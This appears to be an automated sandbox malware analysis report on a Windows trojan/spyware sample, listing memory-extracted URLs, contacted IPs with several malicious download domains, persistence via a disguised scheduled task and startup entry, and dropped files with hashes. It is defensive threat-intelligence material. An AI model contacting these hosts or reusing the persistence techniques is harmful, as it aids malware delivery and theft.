                                                                      high
                                                                      https://duckduckgo.com/ac/?q=EKNYUKXB.25.drfalse
                                                                        high
                                                                        https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000005.00000002.309290210.000001AF9904E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308279245.000001AF99049000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000005.00000003.308466648.000001AF99040000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308542792.000001AF99041000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309276445.000001AF99042000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000005.00000003.308466648.000001AF99040000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308542792.000001AF99041000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309276445.000001AF99042000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.bingmapsportal.comsvchost.exe, 00000005.00000002.309180271.000001AF99013000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000011.00000003.389450224.0000023EEF978000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://api.ip.sb/ipA3D.exe, 0000001B.00000002.482088849.0000000003AC1000.00000004.00000001.sdmp, A3D.exe, 00000027.00000000.470989961.0000000000402000.00000040.00000001.sdmp, BC9C.exe.10.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.308466648.000001AF99040000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308528035.000001AF99045000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoEKNYUKXB.25.drfalse
                                                                                                          high
                                                                                                          https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000005.00000002.309313997.000001AF9906A000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308261175.000001AF99068000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EKNYUKXB.25.drfalse
                                                                                                                    high
                                                                                                                    http://crl.ver)svchost.exe, 00000011.00000002.416450939.0000023EEF2E9000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    low
                                                                                                                    https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308466648.000001AF99040000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchEKNYUKXB.25.drfalse
                                                                                                                        high
                                                                                                                        https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000011.00000003.390515077.0000023EEF97D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.390700975.0000023EEF99F000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.390647924.0000023EEFE02000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.390626720.0000023EEFE19000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.390587865.0000023EEFE19000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309180271.000001AF99013000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://%s.xboxlive.comsvchost.exe, 00000002.00000002.554676396.0000023727642000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          low
                                                                                                                          https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://ac.ecosia.org/autocomplete?q=EKNYUKXB.25.drfalse
                                                                                                                                  high
                                                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000011.00000003.389450224.0000023EEF978000.00000004.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://dynamic.tsvchost.exe, 00000005.00000003.308279245.000001AF99049000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://disneyplus.com/legal.svchost.exe, 00000011.00000003.389450224.0000023EEF978000.00000004.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000005.00000002.309262853.000001AF9903A000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://activity.windows.comsvchost.exe, 00000002.00000002.554676396.0000023727642000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=EKNYUKXB.25.drfalse
                                                                                                                                                high
                                                                                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://help.disneyplus.com.svchost.exe, 00000011.00000003.389450224.0000023EEF978000.00000004.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=EKNYUKXB.25.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 00000002.00000002.554676396.0000023727642000.00000004.00000001.sdmpfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    low
                                                                                                                                                    https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpfalse
                                                                                                                                                        high

                                                                                                                                                        Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        155.248.231.246
                                                                                                                                                        downloafilesaccess.ddns.netUnited States
                                                                                                                                                        6142SUN-JAVAUStrue
                                                                                                                                                        52.217.141.225
                                                                                                                                                        unknownUnited States
                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                        5.188.89.48
                                                                                                                                                        file-file-host4.comRussian Federation
                                                                                                                                                        34665PINDC-ASRUtrue
                                                                                                                                                        188.166.28.199
                                                                                                                                                        unknownNetherlands
                                                                                                                                                        14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                        86.107.197.138
                                                                                                                                                        unknownRomania
                                                                                                                                                        39855MOD-EUNLtrue
                                                                                                                                                        54.38.220.85
                                                                                                                                                        unicupload.topFrance
                                                                                                                                                        16276OVHFRtrue
                                                                                                                                                        162.159.135.233
                                                                                                                                                        cdn.discordapp.comUnited States
                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                        91.243.44.128
                                                                                                                                                        unknownRussian Federation
                                                                                                                                                        395092SHOCK-1USfalse
                                                                                                                                                        144.76.136.153
                                                                                                                                                        transfer.shGermany
                                                                                                                                                        24940HETZNER-ASDEfalse
                                                                                                                                                        104.192.141.1
                                                                                                                                                        bitbucket.orgUnited States
                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                        185.233.81.115
                                                                                                                                                        unknownRussian Federation
                                                                                                                                                        50113SUPERSERVERSDATACENTERRUtrue
                                                                                                                                                        185.7.214.171
                                                                                                                                                        unknownFrance
                                                                                                                                                        42652DELUNETDEtrue
                                                                                                                                                        185.186.142.166
                                                                                                                                                        unknownRussian Federation
                                                                                                                                                        204490ASKONTELRUtrue
                                                                                                                                                        52.216.132.51
                                                                                                                                                        s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                        16509AMAZON-02USfalse

                                                                                                                                                        Private

                                                                                                                                                        IP
                                                                                                                                                        192.168.2.1

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                        Analysis ID:545822
                                                                                                                                                        Start date:28.12.2021
                                                                                                                                                        Start time:03:21:16
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 13m 33s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:light
                                                                                                                                                        Sample file name:4BfFNMA5mb.exe
                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Number of analysed new started processes analysed:47
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:2
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@45/30@83/15
                                                                                                                                                        EGA Information:Failed
                                                                                                                                                        HDC Information:
                                                                                                                                                        • Successful, ratio: 40.1% (good quality ratio 29.3%)
                                                                                                                                                        • Quality average: 58.1%
                                                                                                                                                        • Quality standard deviation: 40.6%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 52%
                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                        Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                        • HTTP Packets have been reduced
                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, consent.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76
                                                                                                                                                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, noc.social, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        TimeTypeDescription
                                                                                                                                                        03:22:55Task SchedulerRun new task: Firefox Default Browser Agent E25915B5E8CDE390 path: C:\Users\user\AppData\Roaming\jutawrs
                                                                                                                                                        03:22:59API Interceptor7x Sleep call for process: svchost.exe modified
                                                                                                                                                        03:23:13API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                        03:23:18API Interceptor1x Sleep call for process: E936.exe modified
                                                                                                                                                        03:24:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Updater.exe

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        No context

                                                                                                                                                        Domains

                                                                                                                                                        No context

                                                                                                                                                        ASN

                                                                                                                                                        No context

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        No context

                                                                                                                                                        Dropped Files

                                                                                                                                                        No context

                                                                                                                                                        Created / dropped Files

                                                                                                                                                        C:\ProgramData\sqlite3.dll
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):645592
                                                                                                                                                        Entropy (8bit):6.50414583238337
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\A3D.exe.log
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\A3D.exe
                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):700
                                                                                                                                                        Entropy (8bit):5.346524082657112
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                        MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                        SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                        SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                        SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\E936.exe
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):645592
                                                                                                                                                        Entropy (8bit):6.50414583238337
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):0.11014963840036093
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:26YqjXm/Ey6q9995g/jNq3qQ10nMCldimE8eawHjc+9f:26Yvl68TLyMCldzE9BHjc+l
                                                                                                                                                        MD5:D5C813761EA87A8376B0B8400F147D95
                                                                                                                                                        SHA1:E8635A344F9D3068547A2883168EF07239EA15C4
                                                                                                                                                        SHA-256:0DCDDC25B373338B966DB7046BC5BD42905D4938F26EC020A59C84246B5E60BE
                                                                                                                                                        SHA-512:F8B19AB6CA19508F528A3750400D12B92F4C6B5C130E6A38C2D762862A9959FCE181DD2FE6B7932CE0240F84338B924FFB16E811C631E1F585A40A97313149F3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: ................................................................................p........I.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................%....... ......0o(............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.p........Y......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):0.11266050247556877
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:ZjXm/Ey6q9995f1miM3qQ10nMCldimE8eawHza1miIgVP:0l68d1tMLyMCldzE9BHza1tI2
                                                                                                                                                        MD5:3465803C44E00451874070F8A0638BF0
                                                                                                                                                        SHA1:92E936D39D7F323EB92E1D51967AED06B7093D26
                                                                                                                                                        SHA-256:6DE6B43018C796769CF7263B5F68FDD17BF7377FC5CF4F5E16043CEBFE71304A
                                                                                                                                                        SHA-512:740B00B604DB5F10888C102E613BA824A52F66E3C8F94686DFB28DDACE8AD2EDE840FB5BE8832A04E0A1C778A4531E82D45E8EB3A38BDFCC19F977176F59A3A1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: ................................................................................p................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................%....... .......h(............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.p.......O.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):65536
                                                                                                                                                        Entropy (8bit):0.11264287290436234
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12:I0jXm/Ey6q9995kv1mK2P3qQ10nMCldimE8eawHza1mKGP:yl68iv1iPLyMCldzE9BHza1C
                                                                                                                                                        MD5:B461550380404BB6BDAB94BF658A25E6
                                                                                                                                                        SHA1:1371D1F19176AF8BBF12B636BF3DBE1E045E8735
                                                                                                                                                        SHA-256:C56E67D77516CAF86FF213C375628788FAC4A30CD7E1C78E4B0661514B588116
                                                                                                                                                        SHA-512:E15F3C70861FC5F3E487CB2DA4FFC21F9FB1D8D632C2F40C4F05B2470EA2BD4F3A24A6F211FB85A9823B0C796C985ADBDFFAF8334FDD2B91A2A81B404C5D7BA6
                                                                                                                                                        Malicious:false
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview: ................................................................................p.......Ne.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................%....... .....f.`(............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.p........m......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2AA1.exe
                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):339456
                                                                                                                                                        Entropy (8bit):6.205108146157796
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:gNAiKZFNvp5+LCXYRcsW1mCLnkvHPGRXZ7Sw:gAl+LCXYRcssmCLkvGRp7p
                                                                                                                                                        MD5:DB8D46063705007002080046966E53DB
                                                                                                                                                        SHA1:D469B4F245EA2C9C49423804B1D8884AA06474CC
                                                                                                                                                        SHA-256:AC58A56975334D573CD85FACBC0646BE79A7DDB0EA87F8D65F98064FA2DB589B
